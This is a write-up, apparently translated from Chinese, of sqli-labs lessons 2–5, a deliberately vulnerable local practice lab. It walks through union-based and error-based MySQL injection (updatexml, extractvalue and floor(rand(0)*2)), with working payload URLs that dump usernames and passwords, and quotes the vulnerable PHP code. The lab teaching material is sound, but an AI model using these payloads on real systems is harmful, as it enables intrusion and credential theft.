Sqli-labs customs clearance (less2-less5)
2022-07-02 07:00:00 【Xu Jirong】
GET numeric injection
We test according to the steps from the previous article.
Determine the injection point:
single quote // error
and 1=1 // page normal
and 1=2 // page error
Determine the number of columns:
order by 5 -- -
Determine which columns are displayed on the page:
union select 1,2,3,4-- -
Display the current user and database:
union select 1,user(),database(),4 -- -
List all table names of the specified database:
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),3,4 -- -
List the columns of the specified table:
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name= 'users'),3,4 -- -
Dump all values of the chosen columns:
union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3,4 -- -
Let's look at the source code first. Apart from this one line, the code is the same as in Less-1:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
Less-1 has:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
One is numeric, the other is character type.
Let's follow the process. The first step is to test whether there is an injection point.
SELECT * FROM users WHERE id=1' LIMIT 0,1 // error, and part of the query statement is exposed
http://localhost/sqli/Less-2/?id=1 and 1=1
SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 // page normal
http://localhost/sqli/Less-2/?id=1 and 1=2
SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 // empty result
From this we can judge that there is probably an injection point here, and that it is numeric.
Here order by cannot be used, so we use union select to test the number of columns.
http://localhost/sqli/Less-2/?id=1 union select 1,2,3,4 -- -
SELECT * FROM users WHERE id=1 union select 1,2,3,4 -- - LIMIT 0,1 // error
http://localhost/sqli/Less-2/?id=1 union select 1,2,3 -- -
SELECT * FROM users WHERE id=1 union select 1,2,3 -- - LIMIT 0,1 // page normal
From this we can judge that the number of columns is 3.
But at this point there is no display position for our data. Why? Let's check in Navicat.
Because id=1 is a valid value and the query ends with LIMIT 0,1, only the first row is shown, so the second row (the union part) is never displayed. We therefore change id to a non-existent value, or make the first half of the union query return nothing.
http://localhost/sqli/Less-2/?id=1 and 1=2 union select 1,2,3 -- -
SELECT * FROM users WHERE id=1 and 1=2 union select 1,2,3 -- - LIMIT 0,1
Now the display position appears. The rest is the same as Less-1; we query the usernames and passwords directly.
http://localhost/sqli/Less-2/?id=1 and 1=2 union select 1,(select GROUP_CONCAT(CONCAT_WS(0x7e,username,password))from users),3 -- -
SELECT * FROM users WHERE id=1 and 1=2 union select 1,(select GROUP_CONCAT(CONCAT_WS(0x7e,username,password))from users),3 -- - LIMIT 0,1
This time let's not look at the source code and test step by step.
localhost/sqli/Less-3/?id=1' // error, and the second half of the query statement is exposed: '1'') LIMIT 0,1
localhost/sqli/Less-3/?id=1 and 1=1
// normal result
localhost/sqli/Less-3/?id=1 and 1=2
// normal result
In fact the second half of the query has already been exposed here, and we can see that the closing is '). But let's assume there were no such error message.
This may be the result of implicit conversion; it only tells us that the parameter is not numeric but character type. So we try closing with ' (a single quote).
localhost/sqli/Less-3/?id=1' and '1'='1
// normal result
localhost/sqli/Less-3/?id=1' and '1'='2
// empty result
Can we conclude that it is closed by a single quote? We keep testing step by step.
localhost/sqli/Less-3/?id=0' order by 3 -- -
Even if we could not see the error message, from this we can infer that the closing symbol does not match.
The common closing symbols are nothing more than single quotes, double quotes, and combinations with brackets. Why did closing with a single quote appear to work just now? Let's look at the PHP code:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
Let's look at the query statement.
About MySQL boolean conversion: for ease of understanding, we drop LIMIT 0,1.
localhost/sqli/Less-3/?id=1' and '1'='1
SELECT * FROM users WHERE id=('1' and '1'='1')
Let's try this:
localhost/sqli/Less-3/?id=2' and '1'='1
SELECT * FROM users WHERE id=('2' and '1'='1')
And this:
localhost/sqli/Less-3/?id=2a' and '1'='1
SELECT * FROM users WHERE id=('2a' and '1'='1')
Why is that? Let's work through the logic of the first statement.
localhost/sqli/Less-3/?id=1' and '1'='1
SELECT * FROM users WHERE id=('1' and '1'='1')
The '1' before and is converted to the number 1.
The '1'='1' after and evaluates to TRUE.
When the number 1 meets the TRUE on the right, it is converted to TRUE for the boolean operation; the resulting TRUE (1) is then compared with id, so the result is the same as querying id=1.
Why is the second statement the same as the first?
- When an operator, function or control structure requires a boolean argument, the value is converted automatically.
- A value >= 1 is converted to TRUE.
- 0 or a non-numeric string is converted to FALSE.
Why "non-numeric"? This involves the implicit conversion mentioned in the previous blog post. Take the third statement:
'2a' is first implicitly converted to the number 2, then, because it takes part in an operation with a boolean, it becomes TRUE.
In the same way, the fourth statement produces an empty output.
So this may lead to a wrong judgement; pay attention here.
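To make the conversion rules above concrete, here is a small Python model (added here, not part of the original post) that replays the three WHERE clauses: the leading-numeric-prefix conversion ('2a' becomes 2), the boolean AND, and the final comparison with id. The users table is a constructed stand-in.

```python
import re

# MySQL coerces a string used in a numeric context to the number formed by its
# leading numeric prefix ('2a' -> 2, 'abc' -> 0). In a boolean context a
# non-zero number is TRUE and 0 is FALSE. This is a model of that behaviour,
# not MySQL's own code.
_NUM_PREFIX = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def mysql_to_number(s: str) -> float:
    """Implicit string -> number conversion: keep the leading numeric prefix, else 0."""
    m = _NUM_PREFIX.match(s)
    return float(m.group(0)) if m else 0.0


def mysql_truth(value) -> bool:
    """Boolean context: strings are converted to numbers first; non-zero is TRUE."""
    if isinstance(value, str):
        value = mysql_to_number(value)
    return value != 0


def where_clause_value(injected_id: str, tail_is_true: bool) -> int:
    """Value of  id=('<injected_id>' and '1'='1')  (or '1'='2' when tail_is_true is False).

    The AND yields 1 for TRUE and 0 for FALSE; that integer is what id is compared with.
    """
    return 1 if (mysql_truth(injected_id) and tail_is_true) else 0


# Constructed stand-in for the users table: id -> username
USERS = {1: "user1", 2: "user2", 3: "user3"}


def run_query(injected_id: str, tail_is_true: bool = True):
    """SELECT username FROM users WHERE id=('<injected_id>' and <tail>) on the sample table."""
    return USERS.get(where_clause_value(injected_id, tail_is_true))
```

Note that id=2 and id=2a both return the id=1 row, which is exactly the misjudgement the text warns about.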
The rest is the same as before; only the closing is ').
We query the usernames and passwords directly:
localhost/sqli/Less-3/?id=0') union select 1,(select group_concat(username)from users),(select group_concat(password)from users) -- -
SELECT * FROM users WHERE id=('0') union select 1,(select group_concat(username)from users),(select group_concat(password)from users) -- -') LIMIT 0,1
So this is a GET character-type injection closed with ').
// echo has a value
http://localhost/sqli/Less-4/?id=1 and 1=1
// echo has a value
http://localhost/sqli/Less-4/?id=1 and 1=2
// echo has a value
So it can be determined that this is not numeric injection. Keep trying:
http://localhost/sqli/Less-4/?id=1' and '1'='1
// echo has a value
http://localhost/sqli/Less-4/?id=1 and '1'='2
// echo has a value
What finally worked was ").
http://localhost/sqli/Less-4/?id=1") and ("1")=("1
// echo has a value
http://localhost/sqli/Less-4/?id=1") and ("1")=("2
// empty result
The following test process is the same as before; let's go straight to the usernames and passwords.
http://localhost/sqli/Less-4/?id=0") union select 1,(select group_concat(username) from users),(select group_concat(password) from users) -- -
SELECT * FROM users WHERE id=("0") union select 1,(select group_concat(username) from users),(select group_concat(password) from users) -- -") LIMIT 0,1
Finally let's look at the relevant part of the PHP source; the rest is the same.
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
Here . is PHP's string concatenation operator:
it joins two strings, similar to + in Python.
$a = "Hello"."Word";
The value of $a is "HelloWord".
So this is a GET character-type injection closed with ").
// error echo
http://localhost/sqli/Less-4/?id=1 and 1=1
// page displays normally, but no value is echoed
http://localhost/sqli/Less-4/?id=1 and 1=2
// page displays normally, but no value is echoed
We found by trial that it is closed with ' (a single quote):
http://localhost/sqli/Less-4/?id=1' and '1'='1
// page displays normally, but no value is echoed
http://localhost/sqli/Less-4/?id=1' and '1'='2
// page displays an empty result
There is an error message but no value is echoed. Let's look at the PHP source:
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
if($row)
{
    // the query matched a row: only a fixed banner is printed, none of the row data
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    // the query failed or matched nothing: the MySQL error text is printed
    echo '<font size="3" color="#FFFF00">';
    print_r(mysqli_error($con1));
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
} // closes the surrounding if(isset($_GET['id']))
else {
    echo "Please input the ID as parameter with numeric value";}
We can see that when the query succeeds, the row values are not echoed; when it fails, only the error message is shown.
So at this point we can only use error-based injection.
The error message carries back the data we want. How? Through three error-generating functions: updatexml(), extractvalue() and floor().
Syntax: updatexml(XML_document, XPath_string, new_value)
The first parameter, XML_document, is a string: the name of the XML document object.
The second parameter, XPath_string, is an XPath-format string.
The third parameter, new_value, is a string that replaces the matched data.
In plain words, it finds data and replaces it. We do not make use of the first and third parameters; what we use is the second parameter, and specifically its error return value.
Let's see what XPath is.
XPath is a language for locating information in an XML document. Let's put in some parameters and try:
http://localhost/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,version()),0) -- -
SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x7e,version()),0) -- -' LIMIT 0,1
concat() is a string concatenation function, and 0x7e stands for ~ (this was probably mentioned before). What is the principle of the echo? Our aim is to supply an invalid xpath parameter so that the query errors, and the error message exposes the result of the query placed in the xpath position. You can look up the xpath standard yourself. Without the ~,
the echo may be incomplete, because the start of the result may happen to conform to the xpath standard while the rest does not (that is my guess; I don't want to dig into this). With a ~ prepended, it fails the specification right at the first character. Alternatively, the data-fetching query statements are simply placed inside updatexml(). We get the username and password directly:
http://localhost/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password))from users)),0) -- -
SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password))from users)),0) -- -' LIMIT 0,1
The display is incomplete.
You can output one row at a time instead:
http://localhost/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1)),0) -- -
SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1)),0) -- -' LIMIT 0,1
In addition to that there is extractvalue().
extractvalue(): returns, from the target XML, the string matching the query.
Syntax: extractvalue(XML_document, XPath_string)
The first parameter, XML_document, is a string: the name of the XML document object (Doc in the referenced example).
The second parameter, XPath_string, is an XPath-format string.
http://localhost/sqli/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1))) -- -
SELECT * FROM users WHERE id='1' and extractvalue(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1))) -- -' LIMIT 0,1
The principle of this one is more involved.
Let's look at the result first:
http://localhost/sqli/Less-5/?id=1' and (SELECT 2 from(select count(*),CONCAT(DATABASE(),floor(rand(0)*2))x from users group by x)a)-- -
SELECT * FROM users WHERE id='1' and (SELECT 2 from(select count(*),CONCAT(DATABASE(),floor(rand(0)*2))x from users group by x)a)-- -)' LIMIT 0,1
The following refers to the article "MySQL error-based injection: research on the principle of the floor(rand(0)*2) error".
I'll type it out again; I like to type while reading.
Let's look at rand() first.
rand() returns a random number between 0 and 1. It is a pseudorandom function; the 0 inside rand(0) is the seed, and a fixed seed always produces the same sequence of random numbers.
The floor(rand(0)*2) function
floor() returns the largest integer less than or equal to x. The above multiplies a value between 0 and 1 by 2 and then rounds down, giving 0 or 1.
Because the seed is fixed, this sequence is also fixed.
group by
It mainly groups the data (puts identical values into the same group).
floor(rand(0)*2) x: here floor(rand(0)*2) is given the alias x, nothing more.
count(*)
Counts the number of records in the result.
So when we use the following statement:
select count(*),floor(rand(0)*2) x from users group by x
Literally, this statement is meant to count how many distinct random values are generated and how many of each there are. Logically, for 13 rows the sequence is 0110110011101: five 0s and eight 1s. But instead an error is reported.
How group by works
Why? The key is to understand how group by works. During execution, group by loops over each row of data and saves the results in a temporary table keyed on the group key. When reading each row's key: if the key already exists in the temporary table, the data in the temporary table is updated (an update, with no recalculation of the rand value); if the key does not exist in the temporary table, the row's key is inserted into the temporary table (and when inserting, the rand value is recalculated).
To understand this, consider the two cases below.
Recall again the results computed by rand(0): 01101100...
Our goal is to produce such a table, where key is the primary key and is unique. As mentioned above, group by loops over the table. On the first pass, rand(0) is called first and floor(rand(0)*2) evaluates to 0.
0 is not in the table, so we take the second case:
the value must be recalculated and inserted.
The second calculation gives 1, so what is actually inserted is 1, and the corresponding count(*) is also 1, as follows:
Then we go on to the second row. Be careful not to be confused by the rand() function: the order of rand() results is the same, but it is not the case that every row of the generated table gets the same result. Going through the second row, a calculation is needed again, and the third calculation gives 1.
We check the virtual table and find that this value exists, so we take the first case:
we can update the data, so count(*) is incremented by 1, as follows:
Going through the third row, the fourth calculation gives 0.
We check the virtual table: 0 is not there, so we take the second case.
A new row is inserted, and since key is the primary key and must be unique, when the recalculated value is inserted there is a primary key conflict, i.e. the Duplicate entry error.
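To make the temporary-table walk above concrete, here is a short Python model of the process (added here, not from the original post or from MySQL's source). The floor(rand(0)*2) sequence is the one quoted in the text, the prefix argument models concat(database(), ...), and the returned error text mirrors MySQL's Duplicate entry message.

```python
# Model of how GROUP BY evaluates
#   select count(*), concat(<prefix>, floor(rand(0)*2)) x from users group by x
# The group key is evaluated once to look up the temporary table and evaluated
# AGAIN when a new group row is inserted, which is what makes the key collide.

# First 13 values of floor(rand(0)*2), as quoted in the text (RAND(0) is seeded, so fixed)
FLOOR_RAND0_SEQ = [0, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1]


def group_by_rand(num_rows, prefix="", seq=FLOOR_RAND0_SEQ):
    """Simulate GROUP BY over num_rows rows.

    Returns (temp_table, trace, error): temp_table maps key -> count(*),
    trace records (row, key, action) for each scanned row, and error is the
    Duplicate entry message at the point MySQL would raise it, or None.
    """
    values = iter(seq)
    temp, trace = {}, []
    for row in range(1, num_rows + 1):
        lookup_key = f"{prefix}{next(values)}"       # 1st evaluation: used only to look up the group
        if lookup_key in temp:
            temp[lookup_key] += 1                      # existing group: update the count, no new rand()
            trace.append((row, lookup_key, "update"))
            continue
        insert_key = f"{prefix}{next(values)}"       # 2nd evaluation: rand() recomputed for the insert
        if insert_key in temp:
            trace.append((row, insert_key, "duplicate"))
            return temp, trace, f"Duplicate entry '{insert_key}' for key 'group_key'"
        temp[insert_key] = 1                           # new group stored under the recomputed key
        trace.append((row, insert_key, "insert"))
    return temp, trace, None


if __name__ == "__main__":
    table, steps, err = group_by_rand(13, prefix="security")
    for step in steps:
        print(step)
    print(err)
```

With the sequence 0,1,1,0,1,... the collision happens on the third row (lookup gives security0, the insert recomputes security1, which already exists), so the query only errors when the table has at least three rows.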
Complicated, isn't it? And it's not over yet.
Now we put the data we want to query into concat():
select count(*),concat(database(),floor(rand(0)*2))x from users group by x
The database is 'security', and the 1 is appended to the end, so security1 is the conflicting primary key.
Then can we simply put the statement above after and?
SELECT * FROM users WHERE id='1' and (select count(*),CONCAT(DATABASE(),floor(rand(0)*2))x from users group by x)-- -)' LIMIT 0,1
No. It reports an error, Operand should contain 1 column. Why? The statement after and produces a virtual table, but what and needs is a boolean value, so we have to turn the query after and into a boolean.
select * from users where id=1 and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from users group by x)a)
Now and has no problem, either grammatically or logically.
So our final payload is:
http://localhost/sqli/Less-5/?id=1' and (SELECT 1 from(select count(*),CONCAT(DATABASE(),floor(rand(0)*2))x from users group by x)a)-- -
SELECT * FROM users WHERE id='1' and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from users group by x)a) -- -' LIMIT 0,1